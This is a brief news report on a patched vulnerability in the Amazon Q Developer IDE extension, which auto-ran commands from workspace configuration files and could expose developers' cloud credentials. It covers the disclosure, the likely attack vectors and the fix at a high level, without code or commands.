Amazon Q Developer extension vulnerability could have exposed cloud credentials

A vulnerability was discovered by Wiz researchers in the Amazon Q Developer extension for Visual Studio Code, potentially allowing attackers to steal developers' cloud credentials. The issue arises from the extension's automatic execution of commands within workspace configuration files without user consent. This could have enabled malicious actors to compromise cloud infrastructure by luring developers into opening compromised code repositories, based on information published by Security Week.

The vulnerability, tracked as CVE-2026-12957, allowed attackers to execute arbitrary commands by embedding malicious code in workspace configuration files. When a developer opened such a repository, the Amazon Q Developer extension would automatically run these commands, potentially exfiltrating active cloud credentials and API keys. Potential attack vectors include fake coding tests, typosquatted open-source packages, or malicious pull requests, according to Wiz. AWS was notified on April 20 and released a patch on May 12.

The vulnerability affected multiple IDEs, including Visual Studio Code, JetBrains, Eclipse, and Visual Studio. AWS stated that the language server updates automatically for most users, mitigating the risk. Similar vulnerabilities have been identified in other AI coding tools, highlighting a broader security concern in the development ecosystem.

Source: Security Week